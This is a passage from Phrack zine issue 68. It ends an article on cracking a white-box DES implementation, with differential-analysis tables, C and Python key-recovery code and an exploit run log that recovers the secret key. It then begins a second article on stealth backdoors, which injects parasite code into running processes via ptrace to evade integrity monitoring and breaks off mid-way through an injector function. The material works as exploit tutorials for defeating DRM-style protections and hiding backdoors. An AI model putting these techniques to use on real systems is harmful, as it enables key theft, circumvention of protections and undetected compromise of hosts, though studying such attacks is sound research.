b_25 :: 08 d0 00 00 00 00 00 00 00 00 00 00
|
|
b_27 :: 00 00 04 20 00 00 00 00 00 00 00 00
|
|
b_29 :: 00 00 00 00 05 80 00 00 00 00 00 00
|
|
b_31 :: 00 00 00 00 00 00 04 20 00 00 00 00
|
|
b_33 :: 02 70 00 00 00 00 00 00 00 00 00 00
|
|
b_35 :: 00 00 0c f0 00 00 00 00 00 00 00 00
|
|
b_37 :: 00 00 00 00 0d b0 00 00 00 00 00 00
|
|
b_39 :: 00 00 00 00 00 00 0f a0 00 00 00 00
|
|
b_41 :: 0c 00 00 00 00 00 00 00 0f 00 00 00
|
|
b_43 :: 00 00 0d 00 00 00 00 00 00 02 00 00
|
|
b_45 :: 00 00 00 00 09 00 00 00 00 00 05 00
|
|
b_47 :: 00 00 00 00 00 00 03 00 00 00 00 03
|
|
b_49 :: 0f 00 00 00 00 00 00 00 0d 00 00 00
|
|
b_51 :: 00 00 06 00 00 00 00 00 00 03 00 00
|
|
b_53 :: 00 00 00 00 0b 00 00 00 00 00 0c 00
|
|
b_55 :: 00 00 00 00 00 00 02 00 00 00 00 01
|
|
b_57 :: b0 00 00 00 00 00 00 0c 00 00 00 00
|
|
b_59 :: 00 03 60 00 00 00 00 00 00 00 00 00
|
|
b_61 :: 00 00 00 0e 40 00 00 00 00 00 00 00
|
|
b_63 :: 00 00 00 00 00 0b f0 00 00 00 00 00
|
|
---------------------------------------------------------------------------
|
|
|
|
And that's exactly what we were expecting :) Well to be honest, I first
|
|
observed the result of the differential analysis, then remarked a 'strange'
|
|
behavior related to the odd bits and finally figured out why using maths ;)
|
|
|
|
One cool thing with this situation is that we can easily leak the
|
|
position of the specific S-Boxes inside the T-Boxes. First let's compare
|
|
the differential analysis of even bits 28,36,52,60 and of odd bit 1:
|
|
|
|
---------------------------------------------------------------------------
|
|
b_01 :: 00 05 d0 00 00 00 00 00 00 00 00 00
|
|
b_28 :: 0d 75 dd 00 00 00 04 20 0f d2 00 00
|
|
b_36 :: 0c 05 d0 00 09 00 04 20 cf 00 05 00
|
|
b_52 :: 00 05 d0 09 00 00 00 00 90 0f 00 00
|
|
b_60 :: 0c 05 d6 09 00 00 02 00 3f 0d 00 01
|
|
---------------------------------------------------------------------------
|
|
|
|
Obviously setting these even bits one by one induces the same
|
|
modification (amongst others) as setting the odd bit 1 (nibbles 01L (0x5)
|
|
and 02H (0xd)) so there must be some kind of mathematical link between them
|
|
because the other bits do not have such property.
|
|
|
|
|
|
Playing with Sbox
|
|
------------------
|
|
|
|
|
|
The reason behind this behavior is very simple to explain. But first,
|
|
let's go back to the example of plaintext 'A' (null vector):
|
|
|
|
We know that:
|
|
|
|
   R1_A = L0_A [+] P(S1[0 [+] k0] || S2[0 [+] k1] || ... || S8[0 [+] k7])
   R1_A = 0 [+] P(S1[k0] || S2[k1] || ... || S8[k7])
   R1_A = P( S1[k0] || S2[k1] || ... || S8[k7] )
|
|
|
|
Where:
|
|
The ki being 6 bits vectors (0 <= i < 8)
|
|
K0 = k0 || k1 || k2 ... || k7
|
|
|
|
Thus in the case of plaintext 0 (A), R1_A is the permutation of the
|
|
Sbox output whose inputs are the bits of the first subkey.
|
|
|
|
Now let us focus on 1 of the 4 bits generated by an Sbox S (which could
|
|
be any of the 8). We do not know its value (b) but when the P-box is
|
|
applied it will be located in a particular nibble as illustrated below:
|
|
|
|
|
|
R1_A = f(R0,K0) = ???? ?b?? ???? ???? ???? ???? ???? ????
|
|
|
|
^
|
|
|__ The bit
|
|
|
|
<------------------------------------->
|
|
(4bits x 8) = 32 bits state
|
|
|
|
|
|
Because a WB DES implementation is working with a duplicated Rx this
|
|
will give us the following internal state:
|
|
|
|
... ??b? ???? ???? ???b ...
|
|
|
|
^ ^
|
|
| |
|
|
-------------------- b is duplicated
|
|
|
|
<------------------------->
|
|
96 bits state
|
|
|
|
|
|
Now following what was explained previously with odd bits, out of the
|
|
32 possible B, one of them will affect b when L0_B is XORed with f(0,K0).
|
|
|
|
So considering a 96 bits internal state inside the WB, this gives us:
|
|
|
|
... ??a? ???? ???? ???a ...
|
|
|
|
With:
|
|
a = b [+] 1
|
|
|
|
As a result, the differential between A and B would be:
|
|
|
|
... ??b? ???? ???? ???b ... (from A)
|
|
|
|
[+]
|
|
|
|
... ??a? ???? ???? ???a ... (from B)
|
|
|
|
=
|
|
|
|
... ??1? ???? ???? ???1 ... ( because a [+] b
|
|
= a [+] a [+] 1
|
|
= 1 )
|
|
|
|
From now on, we will call this differential our 'witness' and by
|
|
extension, the two nibbles where this 1 shows up the 2 witness nibbles.
|
|
|
|
|
|
Playing with the witness
|
|
------------------------
|
|
|
|
|
|
Now imagine that we're using another plaintext (X) with weight 1 and
|
|
whose set bit is one of the 6 possible bits influencing Sbox S. There are
|
|
two possible situations:
|
|
|
|
- S still produces b
|
|
- S now produces b+1
|
|
|
|
If we perform a differential analysis between X and A (null vector)
|
|
this gives us:
|
|
|
|
case 1:
|
|
=======
|
|
|
|
... ??b? ???? ???? ???b ... (from A)
|
|
|
|
[+]
|
|
|
|
... ??b? ???? ???? ???b ... (from X)
|
|
|
|
=
|
|
|
|
... ??0? ???? ???? ???0 ... <-- useless output
|
|
|
|
case 2:
|
|
=======
|
|
|
|
... ??b? ???? ???? ???b ... (from A)
|
|
|
|
[+]
|
|
|
|
... ??a? ???? ???? ???a ... (from X)
|
|
|
|
=
|
|
|
|
... ??1? ???? ???? ???1 ... <-- witness vector :)))
|
|
|
|
|
|
So case 2 is perfect because it gives us a distinguisher. We can test
|
|
all 32 possible X (each of them having a different even bit set) and
|
|
observe the ones which produce the witness vector associated with b.
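
   A sketch of that search; wb_first_round() is a hypothetical helper
returning the 96 bits state (12 bytes) after wb_init() and the first
wb_round(), and the bit numbering is again an assumption:

---------------------------------------------------------------------------
# Sketch: find the even input bits whose differential reproduces a given
# witness (the two marked nibbles).

def matches_witness(delta, witness):
    for i in range(12):
        for mask in (0xF0, 0x0F):
            w = witness[i] & mask
            if w and (delta[i] & mask) != w:
                return False
    return True

def find_related_bits(witness, wb_first_round):
    ref = wb_first_round([0] * 8)
    hits = []
    for bit in range(0, 64, 2):                  # the 32 even bits
        x = [0] * 8
        x[bit // 8] = 0x80 >> (bit % 8)          # MSB-first convention
        delta = [a ^ b for a, b in zip(ref, wb_first_round(x))]
        if matches_witness(delta, witness):
            hits.append(bit)
    return hits
---------------------------------------------------------------------------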
|
|
|
|
This is exactly what we did implicitly when we discovered the link
|
|
between bits 28, 36, 52 and 60. Or if you're lost let's say that we've just
|
|
discovered something huge: the bits 28, 36, 52 and 60 are the input of the
|
|
same Sbox and bit 1 is one of the output of this Sbox. At this point the
|
|
protection took a heavy hit.
|
|
|
|
Remark: The first subkey is modifying the input sent to the Sbox. As a
|
|
consequence the relation previously found is "key dependent". This will be
|
|
of importance later, keep reading!
|
|
|
|
|
|
Going further
|
|
-------------
|
|
|
|
|
|
Let's think. At this point and thanks to our analysis of wb_init()
|
|
we're almost sure that there is no external encoding applied to the input.
|
|
So there should be a match between our practical results and the
|
|
theoretical relations in the original DES algorithm. To verify my theory, I
|
|
wrote a little script to compute the positions of the bits involved with
|
|
each Sbox:
|
|
|
|
---------------------------------------------------------------------------
|
|
$ ./bitmapping.py
|
|
[6, 56, 48, 40, 32, 24] <-- Sbox 1
|
|
[32, 24, 16, 8, 0, 58] <-- Sbox 2
|
|
[0, 58, 50, 42, 34, 26]
|
|
[34, 26, 18, 10, 2, 60]
|
|
[2, 60, 52, 44, 36, 28] <-- Sbox 5
|
|
[36, 28, 20, 12, 4, 62]
|
|
[4, 62, 54, 46, 38, 30]
|
|
[38, 30, 22, 14, 6, 56] <-- Sbox 8
|
|
---------------------------------------------------------------------------
|
|
|
|
Oh interesting so Sbox 5 seems to match with our practical result.
|
|
Going deeper, we need to check if bit 01 is involved with this Sbox. Again
|
|
I wrote another script to compute the position of odd bits involved with
|
|
the Sbox in the original DES and this gives us:
|
|
|
|
---------------------------------------------------------------------------
|
|
$ ./sbox.py | grep 'SBOX 5'
|
|
bit 41 XORED with bit 00 of SBOX 5 (19)
|
|
bit 01 XORED with bit 03 of SBOX 5 (16)
|
|
bit 19 XORED with bit 02 of SBOX 5 (17)
|
|
bit 63 XORED with bit 01 of SBOX 5 (18)
|
|
---------------------------------------------------------------------------
|
|
|
|
So bit 01 is indeed involved. However let's try to be careful. In
|
|
cryptanalysis it's easy to be fooled, so let's make extra checks. For
|
|
example can we link a subset of even bits {2, 28, 36, 44, 52, 60} with bit
|
|
19 of the same Sbox?
|
|
|
|
---------------------------------------------------------------------------
|
|
19 :: 00 00 00 09 00 00 00 00 00 0f 00 00
|
|
2 :: 0c 00 06 00 00 0b f2 60 0f 03 00 01
|
|
28 :: 0d 75 dd 00 00 00 04 20 0f d2 00 00
|
|
36 :: 0c 05 d0 00 09 00 04 20 cf 00 05 00
|
|
44 :: 00 00 00 09 00 0b f0 00 20 0f 00 00
|
|
52 :: 00 05 d0 09 00 00 00 00 90 0f 00 00
|
|
60 :: 0c 05 d6 09 00 00 02 00 3f 0d 00 01
|
|
---------------------------------------------------------------------------
|
|
|
|
Bit 19 is linked to bit 44 and 52 => YES. At this point, we should
|
|
check automatically that the bit relations are satisfied for all the Sboxes
|
|
but it's tedious. That's the problem :-P Because I was lazy, I manually
|
|
checked all the relations. Fortunately with the help of scripts, this only
|
|
took me a couple of minutes and it was a 100% match. Again, this proves
|
|
nothing but as I said earlier, we're working with guesses.
|
|
|
|
|
|
Towards a perfect understanding of differential analysis
|
|
--------------------------------------------------------
|
|
|
|
|
|
Didn't you notice something particular with bits 02, 28 and 60? Well the
|
|
'impacted' nibbles were neither 0 nor a witness nibble. For example
|
|
consider bit 60:
|
|
|
|
---------------------------------------------------------------------------
|
|
19 :: 00 00 00 09 00 00 00 00 00 0f 00 00
|
|
60 :: 0c 05 d6 09 00 00 02 00 3f 0d 00 01
|
|
---------------------------------------------------------------------------
|
|
|
|
The first impacted nibble '0x9' is a good one (witness nibble) but the
|
|
second one is neither '0x0' nor '0xf' (witness). How is that possible?
|
|
|
|
Well the answer lies in both:
|
|
- the (non)-middle bits
|
|
- the P-box
|
|
|
|
Indeed if you consider the bits sent to Sbox 5, you have to know that:
|
|
- bits 02 and 60 are sent to both Sbox 4 & 5
|
|
- bits 52 and 44 are sent to Sbox 5
|
|
- bits 36 and 28 are sent to both Sbox 5 & 6
|
|
|
|
So when 1 non-middle bit is set, this will impact the output of 2 Sboxes
|
|
and, as we're unlucky, the P-box will have the unfortunate effect of setting
|
|
them in the same nibble, hence the difference observed.
|
|
|
|
|
|
----[ 6.3 - Recovering the first subkey
|
|
|
|
|
|
If the relations observed are 'key dependent', considering the fact
|
|
that the S-Boxes are known (which means unmodified otherwise this would be
|
|
cheating :p) then isn't this an indirect leak on the key itself that could
|
|
be transformed in a key recovery? Oh yes it is :-)
|
|
|
|
|
|
First cryptanalysis
|
|
-------------------
|
|
|
|
|
|
The main idea is really simple: we know that for a given subkey,
|
|
several unitary vectors (plaintexts of weight 1) will produce the same
|
|
output bit.
|
|
|
|
Let's take again the previous case. We have:
|
|
|
|
|
|
.------.------.------.-----.-----.------.
|
|
| b_02 | b_60 | b_52 |b_44 |b_36 | b_28 |
|
|
'------'------'------'-----'-----'------'
|
|
.....
|
|
. + .
|
|
.....
|
|
.------.------.------.-----.-----.------.
|
|
| k24 | k25 | k26 | k27 | k28 | k29 |
|
|
'------'------'------'-----'-----'------'
|
|
|
|
|
v
|
|
*********************
|
|
* Sbox 5 *
|
|
*********************
|
|
|
|
|
v
|
|
.------.------.------.-----.
|
|
| y0 | y1 | y2 | y3 |
|
|
'------'------'------'-----'
|
|
|
|
|
|
Let us consider bit 01. We know that it will be XORed to y2 so from the
|
|
differential analysis we can derive the set of relations:
|
|
|
|
[ k24 [+] 0, k25 [+] 1, k26 [+] 0, k27 [+] 0, k28 [+] 0, k29 [+] 0 ] => b
|
|
[ k24 [+] 0, k25 [+] 0, k26 [+] 1, k27 [+] 0, k28 [+] 0, k29 [+] 0 ] => b
|
|
[ k24 [+] 0, k25 [+] 0, k26 [+] 0, k27 [+] 0, k28 [+] 1, k29 [+] 0 ] => b
|
|
[ k24 [+] 0, k25 [+] 0, k26 [+] 0, k27 [+] 0, k28 [+] 0, k29 [+] 1 ] => b
|
|
|
|
So amongst all possible sets {k24,k25,k26,k27,k28,k29}, only a few of
|
|
them (including the one from the real subkey) will satisfy the relations.
|
|
Testing all possible sets (there are 2^6 = 64 of them) will give us 2 lists
|
|
because we do not know if b=1 or b=0 so we have to consider both cases.
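
A small C sketch of this filtering step is given below. Both the
sbox5_bit() helper (output bit y2 of Sbox 5 for a 6-bit input, to be backed
by the standard DES table) and the sample relations are assumptions used
for illustration only, as is the 6-bit encoding (first input bit = MSB):

---------------------------------------------------------------------------
/*
 * filter_sk.c -- sketch of the subkey candidate filtering.
 * sbox5_bit() is a hypothetical helper to be backed by the standard
 * DES Sbox 5 table; the relation list holds placeholders for the
 * relations you actually measured.
 */
#include <stdio.h>

extern int sbox5_bit(int six_bit_input);   /* returns y2, 0 or 1      */

struct relation { int diff; int out; };    /* input diff => output bit */

static struct relation rel[] = {
    { 0x20, 1 },                           /* e.g. { 1 0 0 0 0 0 } = { 1 } */
    { 0x10, 0 },                           /* e.g. { 0 1 0 0 0 0 } = { 0 } */
    /* ... all the relations collected by the differential analysis   */
};

int main(void)
{
    int nrel = sizeof rel / sizeof rel[0];
    int k, i, b;

    for (b = 0; b <= 1; b++)               /* b unknown: build 2 lists */
        for (k = 0; k < 64; k++) {         /* 2^6 candidate subsets    */
            int ok = 1;
            for (i = 0; i < nrel; i++)
                if ((sbox5_bit(k ^ rel[i].diff) ^ b) != rel[i].out)
                    ok = 0;
            if (ok)
                printf("b=%d candidate {k24..k29} = %d\n", b, k);
        }
    return 0;
}
---------------------------------------------------------------------------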
|
|
|
|
Applying this technique to y0, y1, y2 and y3 will allow us to filter
|
|
efficiently the number of possible candidates as we will only consider
|
|
those present in all lists. The success of this cryptanalysis is highly
|
|
dependent on the number of relations that we will be able to create for a
|
|
particular S-Box. Practically speaking, this is sufficient to recover the
|
|
first subkey as the complexity should be far below 2^48. Should be? Yes I
|
|
didn't test it... I found even better.
|
|
|
|
|
|
Immediate subkey recovery
|
|
-------------------------
|
|
|
|
|
|
As I said above, our success is dependent on the number of equations, so
|
|
improving the cryptanalysis can be done by finding ways to increase this
|
|
number. There are two obvious ways to do that:
|
|
|
|
- There may exist combinations of input bits other than unitary
|
|
vectors (weight > 1) which can produce the witness nibbles in a
|
|
differential analysis.
|
|
- If the impacted nibbles are both 0x0 then this gives us a new
|
|
relation where the expected output bit is b [+] 1
|
|
|
|
Practically speaking this gives us the following result for Sbox5 and
|
|
bit 01:
|
|
|
|
---------------------------------------------------------------------------
|
|
$ ./exploit
|
|
[...]
|
|
{ 1 0 0 0 0 0 } = { 1 } <-- dumping relations for S5 & bit 01
|
|
{ 0 1 0 0 0 0 } = { 0 }
|
|
{ 1 1 0 0 0 0 } = { 0 }
|
|
{ 0 0 1 0 0 0 } = { 0 }
|
|
{ 1 0 1 0 0 0 } = { 1 }
|
|
{ 0 1 1 0 0 0 } = { 1 }
|
|
{ 1 1 1 0 0 0 } = { 1 }
|
|
{ 0 0 0 1 0 0 } = { 1 }
|
|
{ 1 0 0 1 0 0 } = { 0 }
|
|
{ 0 1 0 1 0 0 } = { 0 }
|
|
{ 1 1 0 1 0 0 } = { 1 }
|
|
{ 0 0 1 1 0 0 } = { 1 }
|
|
{ 1 0 1 1 0 0 } = { 0 }
|
|
{ 0 1 1 1 0 0 } = { 1 }
|
|
{ 1 1 1 1 0 0 } = { 0 }
|
|
{ 0 0 0 0 1 0 } = { 0 }
|
|
{ 1 0 0 0 1 0 } = { 1 }
|
|
{ 0 1 0 0 1 0 } = { 0 }
|
|
{ 1 1 0 0 1 0 } = { 0 }
|
|
{ 0 0 1 0 1 0 } = { 1 }
|
|
{ 1 0 1 0 1 0 } = { 0 }
|
|
{ 0 1 1 0 1 0 } = { 0 }
|
|
{ 1 1 1 0 1 0 } = { 1 }
|
|
{ 0 0 0 1 1 0 } = { 0 }
|
|
{ 1 0 0 1 1 0 } = { 0 }
|
|
{ 0 1 0 1 1 0 } = { 1 }
|
|
{ 1 1 0 1 1 0 } = { 0 }
|
|
{ 0 1 0 1 0 1 } = { 1 }
|
|
|
|
[...]
|
|
|
|
[ key candidate is 31]
|
|
---------------------------------------------------------------------------
|
|
|
|
Cryptanalysts have the habit of always evaluating the complexity of
|
|
their attacks but in this case let's say that it's useless. Only one subkey
|
|
appeared to be valid out of the 2^48 possible ones.
|
|
|
|
|
|
----[ 6.4 - Recovering the original key
|
|
|
|
|
|
Now that we've retrieved the first subkey, our goal is almost reached.
|
|
So how do we retrieve the secret key? Well DES subkeys can be seen as
|
|
truncated permutations of the original key. This means that we now have 48
|
|
out of the 56 bits of the original key.
|
|
|
|
I could explain the key scheduling mechanism of the DES, but it's
|
|
useless as the only important thing is to be able to reverse the
|
|
permutation. This is done easily thanks to the following python
|
|
manipulation applied to the sKMap1 array, itself being shamelessly ripped
|
|
from [R13]:
|
|
|
|
---------------------------------------------------------------------------
|
|
>>> InvsKMap1 = [ -1 for i in xrange(64) ]
|
|
>>> for x in xrange(len(InvsKMap1)):
|
|
... if 7-x%8 == 0:
|
|
... InvsKMap1[x] = -2
|
|
...
|
|
>>> for x in xrange(64):
|
|
... if x in sKMap1:
|
|
... InvsKMap1[x] = sKMap1.index(x)
|
|
...
|
|
>>> InvsKMap1
|
|
[19, 8, 12, 29, 32, -1, -1, -2, 9, 0, -1, -1, 44, 43, 40, -2, 5, 22, 10,
|
|
41, 37, 24, 34, -2, 15, 14, 21, 25, 35, 31, 47, -2, 6, 2, 13, 20, 28, 38,
|
|
26, -2, 23, 11, -1, 16, 42, -1, 30, -2, 4, -1, 1, -1, 33, 27, 46, -2, 7,
|
|
17, 18, 3, 36, 45, 39, -2]
|
|
>>>
|
|
---------------------------------------------------------------------------
|
|
|
|
Here is the resulting array:
|
|
|
|
char InvsKMap1[64] = {
|
|
19, 8, 12, 29, 32, -1, -1, -2,
|
|
9, 0, -1, -1, 44, 43, 40, -2,
|
|
5, 22, 10, 41, 37, 24, 34, -2,
|
|
15, 14, 21, 25, 35, 31, 47, -2,
|
|
6, 2, 13, 20, 28, 38, 26, -2,
|
|
23, 11, -1, 16, 42, -1, 30, -2,
|
|
4, -1, 1, -1, 33, 27, 46, -2,
|
|
7, 17, 18, 3, 36, 45, 39, -2
|
|
};
|
|
|
|
My exploit uses this array to build an original key out of both the
|
|
subkey bits and an 8-bit vector. '-1' is set for a bit position where the
|
|
value has to be guessed. There are 8 such positions, and for each of them,
|
|
a bit is taken from the 8-bit vector. '-2' means that the bit can be
|
|
anything. Indeed the most significant bits (the so-called parity bits) of
|
|
the 8 bytes key array are never taken into account (hence the well known
|
|
8 x 7 = 56 bits keylength).
|
|
|
|
Now the only remaining thing to do is to guess these 8 missing bits.
|
|
Obviously for each guess you will generate an original key 'K' and test it
|
|
against a known couple of input/output generated by the white-box. The
|
|
whole operation was implemented below:
|
|
|
|
---------------------------------------------------------------------------
|
|
void RebuildKeyFromSk1(uchar *dst, uchar *src, uchar lastbits)
|
|
{
|
|
int i,j;
|
|
char *plastbits = (char *)&lastbits;
|
|
|
|
memset(dst, 0, DES_KEY_LENGTH);
|
|
for(i=0,j=0; i<64; i++)
|
|
{
|
|
// Parity bit
|
|
if(InvsKMap1[i] == -2)
|
|
continue;
|
|
|
|
// Bit is guessed
|
|
else if(InvsKMap1[i] == -1)
|
|
{
|
|
if(GETBIT(plastbits,j))
|
|
SETBIT(dst,i);
|
|
j++;
|
|
}
|
|
// Bit is already known
|
|
else
|
|
{
|
|
if(GETBIT(src, InvsKMap1[i]))
|
|
SETBIT(dst,i);
|
|
}
|
|
}
|
|
return;
|
|
}
|
|
|
|
[...]
|
|
|
|
const_DES_cblock in = "\x12\x32\xe7\xd3\x0f\xf1\x29\xb3";
|
|
const_DES_cblock expected = "\xa1\x6b\xd2\xeb\xbf\xe1\xd1\xc2";
|
|
DES_cblock key;
|
|
DES_cblock out;
|
|
DES_key_schedule ks;
|
|
|
|
for(missing_bits=0; missing_bits<256; missing_bits++)
|
|
{
|
|
RebuildKeyFromSk1(key, sk, missing_bits);
|
|
memset(out, 0, sizeof out);
|
|
DES_set_key(&key, &ks);
|
|
DES_ecb_encrypt(&in, &out, &ks, DES_ENCRYPT);
|
|
|
|
if(!memcmp(out,expected,DES_BLOCK_LENGTH))
|
|
{
|
|
printf("[+] Key was found!\n");
|
|
[...]
|
|
}
|
|
}
|
|
---------------------------------------------------------------------------
|
|
|
|
The whole cryptanalysis of the white-box is very effective and allows
|
|
us to retrieve a key in a few ms. More precisely it retrieves _1_ of the
|
|
256 possible 8-byte keys ;)
|
|
|
|
---------------------------------------------------------------------------
|
|
$ tar xfz p68-exploit.tgz; cd p68-exploit
|
|
$ wget http://homes.esat.kuleuven.be/~bwyseur/research/wbDES
|
|
$ md5sum wbDES
|
|
b9c4c69b08e12f577c91ec186edc5355 wbDES # you can never be sure ;-)
|
|
$ for f in scripts/*.gdb; do gdb -x $f; done > /dev/null # is quite long
|
|
$ make
|
|
gcc -c wb_init.c -O3 -Wall
|
|
gcc -c wb_round.c -O3 -Wall
|
|
gcc -c wb_final.c -O3 -Wall
|
|
gcc exploit.c *.o -O3 -Wall -o exploit -lm -lcrypto
|
|
gcc wb_main.c *.o -O3 -Wall -o wbdes.try
|
|
gcc entropy.c -o entropy -lm
|
|
$ ./exploit
|
|
|
|
[+] Number of possible candidates = 256
|
|
-> Required computation is 2^(8) * DES()
|
|
|
|
[+] Key was found!
|
|
-> Missing bits: 0x3d
|
|
-> Key: '02424626'
|
|
|
|
$
|
|
---------------------------------------------------------------------------
|
|
|
|
And that's it! So the key was bf-able after all ;>
|
|
|
|
|
|
--[ 7 - Conclusion
|
|
|
|
|
|
Nowadays there are a lot of white-box protections in the wild (DRM but
|
|
not only) using either academic designs or their improvements. Each of them
|
|
is an interesting challenge that you may want to face one day.
|
|
This paper is not ground breaking nor even relevant for the average
|
|
cryptographer, the cryptanalysis of the naked DES being covered in many
|
|
papers including [R16]. I wrote it however with the hope that it would give
|
|
you an overview of what practical white-box cracking could be. I hope you
|
|
enjoyed it :)
|
|
|
|
Feel free to contact me for any question related to this paper using
|
|
the mail alias provided in the title of the paper.
|
|
|
|
|
|
--[ 8 - Gr33tz
|
|
|
|
|
|
Many (randomly ordered) thanks to:
|
|
|
|
- the #f4lst4ff crypt0/b33r team for introducing me to the concept of
|
|
white-box a few years ago.
|
|
- Jb & Brecht for their implementations which gave me a lot of fun :)
|
|
- X, Y, Z who will remain anonymous but nonetheless helped me to
|
|
improve _significantly_ the paper. If you managed to understand a few
|
|
things out of this "blabla" then you must thank them (and especially
|
|
X). I owe you big time man :)
|
|
- asciio authors because without this tool I would never have found the
|
|
courage to write the paper
|
|
- The Phrack Staff for publishing it
|
|
|
|
|
|
--[ 9 - References
|
|
|
|
|
|
[R01] http://en.wikipedia.org/wiki/Feistel_cipher
|
|
[R02] http://2009.hack.lu/index.php/ReverseChallenge
|
|
[R03] http://baboon.rce.free.fr/index.php?post/2009/11/20/
|
|
HackLu-Reverse-Challenge
|
|
[R04] http://www.whiteboxcrypto.com
|
|
[R05] "Cryptanalysis of a White Box AES Implementation", Billet et al.
|
|
http://bo.blackowl.org/papers/waes.pdf
|
|
[R06] "Digital content protection: How to crack DRM and make them more
|
|
resistant", Jean-Baptiste Bedrune
|
|
http://esec-lab.sogeti.com/dotclear/public/publications/
|
|
10-hitbkl-drm.pdf
|
|
[R07] "White-Box Cryptography and an AES Implementation", Eisen et al.
|
|
http://www.scs.carleton.ca/%7Epaulv/papers/whiteaes.lncs.ps
|
|
[R08] "White-Box Cryptography and SPN ciphers", Schelkunov
|
|
http://eprint.iacr.org/2010/419.pdf
|
|
[R09] "A White-box DES Implementation for DRM Applications", Chow et al.
|
|
http://www.scs.carleton.ca/%7Epaulv/papers/whitedes1.ps
|
|
[R10] "White-Box Cryptography", James Muir, Irdeto
|
|
http://www.mitacs.ca/events/images/stories/focusperiods/
|
|
security-presentations/jmuir-mitacs-white-box-cryptography.pdf
|
|
[R11] http://search.cpan.org/dist/App-Asciio/lib/App/Asciio.pm#NAME
|
|
[R12] http://dhost.info/pasjagor/des/start.php
|
|
[R13] "Cryptography: Theory and Practice", D. Stinson, 1st edition
|
|
[R14] "Clarifying Obfuscation: Improving the Security of White-Box
|
|
Encoding", Link et al.
|
|
http://eprint.iacr.org/2004/025.pdf
|
|
[R15] "White-Box Cryptography" (PhD thesis), B. Wyseur
|
|
https://www.cosic.esat.kuleuven.be/publications/thesis-152.pdf
|
|
[R16] "Attacking an obfuscated cipher by injecting faults", Jacob et al.
|
|
http://www.cs.princeton.edu/~mjacob/papers/drm1.pdf
|
|
[R17] "Cryptanalysis of White-Box DES Implementations with Arbitrary
|
|
External Encodings", B. Wyseur
|
|
http://eprint.iacr.org/2007/104.pdf
|
|
|
|
|
|
--[ EOF
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume 0x0e, Issue 0x44, Phile #0x09 of 0x13
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=---------------------=[ Single Process Parasite ]=---------------------=|
|
|
|=----------------=[ The quest for the stealth backdoor ]=---------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=--------------------------=[ by Crossbower ]=--------------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
Index
|
|
|
|
------[ 0. Introduction
|
|
------[ 1. Brief discussion on injection methods
|
|
------[ 2. First generation: fork() and clone()
|
|
------[ 3. Second generation: signal()/alarm()
|
|
------[ 4. Third generation: setitimer()
|
|
------[ 5. Working parasites
|
|
------------[ 5.1 Process and thread backdoor
|
|
------------[ 5.2 Remote "tail follow" parasite
|
|
------------[ 5.3 Single process backdoor
|
|
------[ 6. Something about the injector
|
|
------[ 7. Further readings
|
|
------[ 8. Links and references
|
|
|
|
------[ 0. Introduction
|
|
|
|
In biology a parasite is an organism that grows, feeds, and lives in a
|
|
different organism while contributing nothing to the survival of its host.
|
|
|
|
(There is another interesting definition that, even if it's less relevant,
|
|
I find funny: a professional dinner guest, especially in ancient Greece.
|
|
From Greek parasitos, person who eats at someone else's table,
|
|
parasite : para-, beside; sitos, grain, food.)
|
|
|
|
So, without digressing too much, what do we mean by "parasite" in this
|
|
document? A parasite is simply some executable code that lives within
|
|
another process, but that was injected after its loading time, by a
|
|
third person/program.
|
|
|
|
Any process can become infected quite easily, using standard libraries
|
|
provided by operating systems (we will use process trace, ptrace [0]).
|
|
|
|
The real difficulty for the parasite is to coexist peacefully with the host
|
|
process, without killing it. By "death" of the host we also mean a
|
|
situation where, even if the process remains active, it is no longer
|
|
able to work properly, because its memory has been corrupted.
|
|
|
|
The goal of this document is to create a parasite that lives and lets the
|
|
host process live, as if nothing had happened.
|
|
|
|
Starting with simple techniques, and gradually improving the parasite,
|
|
we'll reach a point where our creature is scheduled inside the process of
|
|
the host, without the need of fork() or similar calls (i.e. clone()).
|
|
|
|
An interesting question is: why is a parasite an excellent backdoor?
|
|
|
|
The simplest answer is that a parasite hides what is not permitted in what
|
|
is allowed, so that:
|
|
- it's difficult to detect using conventional tools
|
|
- it's more stable and easy to use than kernel-level rootkits.
|
|
|
|
If the target system has security tools that automatically monitor the
|
|
integrity of executable files, but that do not perform complete audits of
|
|
memory, the parasite will not trigger any alarm.
|
|
|
|
After this introduction we can dive into the subject.
|
|
|
|
If you prefer practical examples, you can "jump" to paragraph 5,
|
|
which shows three different types of real parasite.
|
|
|
|
------[ 1. Brief discussion on injection methods
|
|
|
|
To separate the creation of the shellcode from the methods used to inject
|
|
it into the host process, this section will discuss how the parasite is
|
|
injected (in the examples of this document).
|
|
|
|
Unlike normal shellcode that, depending on the vulnerability exploited,
|
|
can not contain certain types of characters (e.g. NULLs), a parasite has
|
|
no particular restrictions.
|
|
|
|
It can contain any character, even NULL bytes, because ptrace [0] allows to
|
|
modify directly the .text section of a process.
|
|
|
|
The first question that arises regards where to place parasitic code.
|
|
This memory location must not be essential to the program, and should not
|
|
be invoked by the code after the start (or shortly after the start) of
|
|
the host process.
|
|
|
|
We can use run-time patching, but it's a complicated technique and makes it
|
|
difficult to ensure the correct functioning of the process after the
|
|
manipulation. It is therefore not suitable for complex parasites.
|
|
|
|
The author has chosen to inject the code into the memory range of libdl.so
|
|
library, since it is used during the loading stage of programs but then
|
|
usually no longer necessary (more info: [1][2]).
|
|
|
|
Another reason for this choice is that the memory address of the library,
|
|
when loaded into the process, is exported in the /proc filesystem.
|
|
|
|
You can easily see that by typing:
|
|
$ cat /proc/self/maps
|
|
...
|
|
b7778000-b777a000 rw-p 00139000 fe:00 37071197 /lib/libc-2.7.so
|
|
b777a000-b777d000 rw-p b777a000 00:00 0
|
|
...
|
|
b7782000-b779c000 r-xp 00000000 fe:00 37071145 /lib/ld-2.7.so <---
|
|
...
|
|
|
|
Libdl is mapped at the range b7782000-b779c000 and is executable. The
|
|
code injected starting at the initial address of the range is perfectly
|
|
executable.
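
As a side note, this is roughly how an injector can locate such a range at
run time by parsing /proc/<pid>/maps (a simple sketch of the idea, not
cymothoa's actual code):

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

/* find_ldso.c -- locate the executable mapping of the loader inside a
 * target process by parsing /proc/<pid>/maps. Sketch only; cymothoa's
 * real implementation may differ.                                     */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>

unsigned long find_ldso(pid_t pid)
{
    char path[64], line[512];
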